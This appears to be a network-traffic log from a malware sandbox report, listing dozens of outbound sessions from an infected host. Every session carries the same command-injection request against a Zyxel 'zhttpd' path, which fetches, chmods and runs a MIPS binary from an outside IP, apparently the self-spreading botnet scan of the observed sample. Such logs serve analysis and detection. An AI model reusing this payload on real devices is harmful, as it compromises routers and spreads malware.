                                                  Jan 19, 2024 18:23:45.847762108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2032192.168.2.135255846.166.234.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847810030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2033192.168.2.1360916124.8.58.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847862005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2034192.168.2.1357246207.207.45.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847897053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2035192.168.2.133941078.132.74.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847930908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2036192.168.2.1338068145.0.124.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847965002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2037192.168.2.1352190218.235.74.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848002911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2038192.168.2.135395441.42.145.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848041058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2039192.168.2.13351185.91.140.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848081112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2040192.168.2.136079675.34.60.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848130941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2041192.168.2.135300858.144.33.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848175049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2042192.168.2.13558868.60.134.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848212004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2043192.168.2.1350280220.9.27.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848246098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2044192.168.2.134713885.150.201.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848272085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2045192.168.2.1336006187.171.144.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848321915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2046192.168.2.135771059.215.125.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848371029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2047192.168.2.135428018.57.252.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848395109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2048192.168.2.133485647.150.138.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848438978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2049192.168.2.1341248193.250.66.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848490953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2050192.168.2.13500505.3.135.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848540068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2051192.168.2.1350046212.140.240.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848575115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2052192.168.2.1352404143.75.76.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848628998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2053192.168.2.135736445.216.211.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848668098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2054192.168.2.134570468.53.187.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848709106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2055192.168.2.1334026113.124.38.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848751068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2056192.168.2.134492496.35.66.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848773003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2057192.168.2.1343716159.169.209.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848793983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2058192.168.2.133687885.230.195.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848846912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2059192.168.2.1352080166.214.34.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848875999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2060192.168.2.1341594158.127.124.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848917007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2061192.168.2.134760847.10.11.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848963022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2062192.168.2.135381099.83.154.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.848979950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2063192.168.2.134076812.251.153.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849009991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2064192.168.2.1336504191.72.67.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849070072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2065192.168.2.134948679.223.253.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849090099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2066192.168.2.1348316107.111.9.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849131107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2067192.168.2.1335108148.231.19.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849206924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2068192.168.2.1340360101.63.24.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849229097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2069192.168.2.1350628115.13.130.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849289894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2070192.168.2.133724424.116.237.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849323034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2071192.168.2.1354560197.38.153.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849371910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2072192.168.2.1336018179.219.72.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849407911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2073192.168.2.1336710188.93.157.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849462032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2074192.168.2.1340896134.76.66.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849503040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2075192.168.2.1346014136.154.227.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849543095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2076192.168.2.135035681.51.43.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849570990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2077192.168.2.13446825.148.62.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849603891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2078192.168.2.136078814.117.4.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849639893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2079192.168.2.1347254218.71.253.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849697113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2080192.168.2.1359326198.74.183.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849734068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2081192.168.2.1337156108.113.59.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849786043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2082192.168.2.1354980208.85.216.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849828005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2083192.168.2.1357592190.248.165.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849900961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2084192.168.2.1360414194.186.43.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849925995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2085192.168.2.1351062107.34.237.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.849961996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2086192.168.2.1350316142.232.9.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850013971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2087192.168.2.1351870106.114.116.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850039005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2088192.168.2.1350708135.17.192.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850070000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2089192.168.2.1338626153.235.184.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850138903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2090192.168.2.135196039.102.192.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850173950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2091192.168.2.1343636206.113.190.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850209951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2092192.168.2.133438860.56.217.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850256920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2093192.168.2.1358424202.19.102.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850308895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2094192.168.2.136008650.46.208.48443
                                                  TimestampBytes transferredDirectionData
